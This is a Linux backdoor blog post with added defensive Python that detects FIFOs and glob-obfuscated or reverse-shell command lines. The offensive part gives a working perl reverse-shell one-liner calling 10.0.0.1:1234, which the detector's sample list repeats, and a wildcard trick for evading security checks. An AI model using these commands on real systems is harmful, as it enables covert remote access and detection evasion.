mknod | Linux Backdoor Series
Date: 2022-07-23
0x01 perl
Ubuntu 16.04 ships with perl by default.

```
Usage: perl [switches] [--] [programfile] [arguments]
-0[octal] specify record separator (\0, if no argument)
-a autosplit mode with -n or -p (splits $_ into @F)
-C[number/list] enables the listed Unicode features
-c check syntax only (runs BEGIN and CHECK blocks)
-d[:debugger] run program under debugger
-D[number/list] set debugging flags (argument is a bit mask or alphabets)
-e program one line of program (several -e's allowed, omit programfile)
-E program like -e, but enables all optional features
-f don't do $sitelib/sitecustomize.pl at startup
-F/pattern/ split() pattern for -a switch (//'s are optional)
-i[extension] edit <> files in place (makes backup if extension supplied)
-Idirectory specify @INC/#include directory (several -I's allowed)
-l[octal] enable line ending processing, specifies line terminator
-[mM][-]module execute "use/no module..." before executing program
-n assume "while (<>) { ... }" loop around program
-p assume loop like -n but print line also, like sed
-s enable rudimentary parsing for switches after programfile
-S look for programfile using PATH environment variable
-t enable tainting warnings
-T enable tainting checks
-u dump core after parsing program
-U allow unsafe operations
-v print version, patchlevel and license
-V[:variable] print configuration summary (or a single Config.pm variable)
-w enable many useful warnings
-W enable all warnings
-x[directory] ignore text before #!perl line (optionally cd to directory)
-X disable all warnings
```
Reverse shells in perl work basically the same way as in Python; the Python section went into too much detail, so compare the switches and carry the Python approach over to perl. I don't know perl well, so I'll give the reverse-shell command directly.
- -e / -E
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
0x02 telnet
Ubuntu 16.04 ships with telnet by default.
Options:
-4 Force IPv4 address resolution.
-6 Force IPv6 address resolution.
-8 Request 8-bit operation. This causes an attempt to negotiate the TELNET BINARY option for both input and output. By default telnet is not 8-bit clean.
-E Disables the escape character functionality; that is, sets the escape character to "no character".
-L Specifies an 8-bit data path on output. This causes the TELNET BINARY option to be negotiated on just output.
-a Attempt automatic login. Currently, this sends the user name via the USER variable of the NEW-ENVIRON option if supported by the remote system. The username is retrieved via getlogin(3).
-b address
Use bind(2) on the local socket to bind it to a specific local address.
-d Sets the initial value of the debug toggle to TRUE.
-r Emulate rlogin(1). In this mode, the default escape character is a tilde. Also, the interpretation of the escape character is changed: an escape character followed by a dot causes telnet to disconnect from the remote host. A ^Z instead of a dot suspends telnet, and a ^] (the default telnet escape character) generates a normal telnet prompt. These codes are accepted only at the beginning of a line.
-S tos Sets the IP type-of-service (TOS) option for the telnet connection to the value tos.
-e escapechar
Sets the escape character to escapechar. If no character is supplied, no escape character will be used. Entering the escape character while connected causes telnet to drop to command mode.
-l user
Specify user as the user to log in as on the remote system. This is accomplished by sending the specified name as the USER environment variable, so it requires that the remote system support the TELNET NEW-ENVIRON option. This option implies the -a option, and may also be used with the open command.
-n tracefile
Opens tracefile for recording trace information. See the set tracefile command below.
host Specifies a host to contact over the network.
port Specifies a port number or service name to contact. If not specified, the telnet port (23) is used.
Getting a reverse shell with telnet works the same way as with nc, so it isn't described further here.
Here is one more small thing that was left out earlier.
0x03 mknod
[+] Until now I created named pipes with mkfifo; today I discovered the mknod command, which creates a special file and can be used to create devices, including the following types:
- block device (b)
- character device (c)
- unbuffered character device (u)
- FIFO, i.e. a named pipe (p)
Previously we created a named pipe with `mkfifo /tmp/f`; now we can do the same with `mknod /tmp/f p`.
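Whichever of the two commands is used, the result is the same artifact on disk: a FIFO sitting in a world-writable directory, which is exactly what a defender can sweep for. The Python below is an added example, not code from the original post; it walks the given directories without crossing mount points (the equivalent of `find -xdev`) and reports every FIFO, character device and block device, since device nodes outside `/dev` are just as unusual. The `self_check` helper and the directory list in the `__main__` block are assumptions made for this demonstration.

```python
import os
import stat
import tempfile

# mode test -> human label; the three types mknod can create that leave a file behind
KIND_BY_TEST = (
    (stat.S_ISFIFO, "fifo"),          # mknod ... p  /  mkfifo
    (stat.S_ISCHR, "char device"),    # mknod ... c  (or u)
    (stat.S_ISBLK, "block device"),   # mknod ... b
)


def classify(mode):
    """Return the special-file kind for an st_mode, or None for anything else."""
    for test, kind in KIND_BY_TEST:
        if test(mode):
            return kind
    return None


def find_special_files(roots):
    """Walk each root without crossing mount points and return sorted
    (path, kind) pairs for every FIFO, character device and block device."""
    found = []
    for root in roots:
        try:
            root_dev = os.lstat(root).st_dev
        except OSError:
            continue  # directory absent or unreadable: skip it rather than abort
        for dirpath, dirnames, filenames in os.walk(root):
            kept = []
            for d in dirnames:  # prune subdirectories that live on another filesystem
                try:
                    if os.lstat(os.path.join(dirpath, d)).st_dev == root_dev:
                        kept.append(d)
                except OSError:
                    pass
            dirnames[:] = kept
            for name in filenames:  # os.walk lists FIFOs and device nodes here
                path = os.path.join(dirpath, name)
                try:
                    kind = classify(os.lstat(path).st_mode)
                except OSError:
                    continue
                if kind:
                    found.append((path, kind))
    return sorted(found)


def self_check():
    """Constructed fixture: a throwaway directory holding one FIFO and one
    regular file. Returns the kinds the sweep reports for it."""
    base = tempfile.mkdtemp(prefix="fifo-sweep-")
    try:
        os.mkfifo(os.path.join(base, "f"))
        with open(os.path.join(base, "notes.txt"), "w") as fh:
            fh.write("regular file\n")
        return [kind for _, kind in find_special_files([base])]
    finally:
        for name in os.listdir(base):
            os.unlink(os.path.join(base, name))
        os.rmdir(base)


if __name__ == "__main__":
    # Directories to sweep are an assumption; adjust to the host's drop locations.
    for path, kind in find_special_files(["/tmp", "/var/tmp", "/dev/shm"]):
        print("%-12s %s" % (kind, path))
```

Run it as a periodic job and diff the output against the previous run: a FIFO that appears in `/tmp` between two sweeps is worth a look, whether it was created with mkfifo or with mknod.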
[+] If you're worried about security checks, the backtick and the asterisk are really handy.
Take the command above as an example:
- `mknod /tmp/f p`
- `/*i*/m*no*/ /t*p/f p`
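The two tells a defender can look for, from the perl one-liner in 0x01 and the wildcard-obfuscated mknod in this section: an interpreter handed inline program text that both opens a socket and spawns a shell, and a command whose name is hidden behind glob characters. The Python below is an added example, not code from the original post. It resolves a glob the way the shell does (one path component at a time, so `*` never crosses a `/`) against a constructed list of binaries standing in for the real filesystem, then applies the checks to a set of constructed sample command lines. `KNOWN_BINARIES`, `SAMPLE_COMMANDS` and the indicator lists are assumptions made for the demo; a real tool would build the binary list from the PATH directories.

```python
import shlex
from fnmatch import fnmatchcase

# Constructed stand-in for the host's filesystem (assumption for this demo).
KNOWN_BINARIES = [
    "/bin/mknod", "/bin/mkfifo", "/bin/sh", "/bin/bash", "/bin/ls", "/bin/mkdir",
    "/sbin/mkswap", "/lib/modules", "/usr/bin/perl", "/usr/bin/telnet", "/usr/bin/nc",
]

GLOB_CHARS = set("*?[")
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
# interpreter -> switches that take program text on the command line
INLINE_SWITCHES = {"perl": {"-e", "-E"}, "python": {"-c"}, "python3": {"-c"}}
NET_INDICATORS = ("socket", "connect", "inet_aton")
SHELL_INDICATORS = ("/bin/sh", "/bin/bash", "exec(", "system(")


def resolve_glob(pattern, candidates=KNOWN_BINARIES):
    """Expand a glob like the shell: component by component, so '*' never
    crosses a '/'. A token without glob characters is returned unchanged."""
    if not GLOB_CHARS & set(pattern):
        return [pattern]
    parts = pattern.split("/")
    return [
        cand for cand in candidates
        if len(cand.split("/")) == len(parts)
        and all(fnmatchcase(c, p) for c, p in zip(cand.split("/"), parts))
    ]


def analyze_command(cmdline, candidates=KNOWN_BINARIES):
    """Return a list of findings for one command line (empty when nothing stands out)."""
    findings = []
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return ["command line could not be tokenised"]
    if not argv:
        return findings

    command = argv[0]
    # Tell 1: glob characters in the command position hide the binary's name.
    if GLOB_CHARS & set(command):
        targets = resolve_glob(command, candidates)
        findings.append("glob-obfuscated command %r resolves to %s" % (command, targets or "nothing"))
        if len(targets) == 1:
            command = targets[0]  # analyse the real binary, not the pattern
    base = command.rsplit("/", 1)[-1]

    # Tell 2: a named pipe being created (mkfifo, or mknod with type 'p').
    args = argv[1:]
    if base == "mkfifo" or (base == "mknod" and len(args) >= 2 and args[1] == "p"):
        paths = [a for a in args if not a.startswith("-")] if base == "mkfifo" else args[:1]
        for path in paths:
            where = " in a world-writable directory" if path.startswith(WORLD_WRITABLE) else ""
            findings.append("named pipe created at %r%s" % (path, where))

    # Tell 3: an interpreter given inline code that opens a socket and runs a shell.
    if base in INLINE_SWITCHES:
        code = " ".join(argv[i + 1] for i in range(len(argv) - 1)
                        if argv[i] in INLINE_SWITCHES[base]).lower()
        if any(n in code for n in NET_INDICATORS) and any(s in code for s in SHELL_INDICATORS):
            findings.append("inline %s program opens a socket and spawns a shell" % base)
    return findings


def scan(commands):
    """Run analyze_command over many lines and keep only those with findings."""
    results = []
    for cmd in commands:
        findings = analyze_command(cmd)
        if findings:
            results.append((cmd, findings))
    return results


# Constructed sample command lines (as they would appear in auditd execve records
# or a shell history); the perl line is the one quoted in section 0x01.
SAMPLE_COMMANDS = [
    "ls /tmp/*.log",
    "mkfifo /tmp/f",
    "mknod /tmp/f p",
    "/*i*/m*no* /t*p/f p",
    "mknod /dev/null c 1 3",
    """perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""",
    "perl -e 'print \"hello\\n\"'",
]

if __name__ == "__main__":
    for cmd, findings in scan(SAMPLE_COMMANDS):
        print(cmd)
        for finding in findings:
            print("   ->", finding)
```

Note that a glob in an argument position (`ls /tmp/*.log`) is ordinary shell usage and is deliberately not flagged; the signal is a glob where the program name should be, and resolving it against the binaries actually present turns an opaque pattern into a concrete alert.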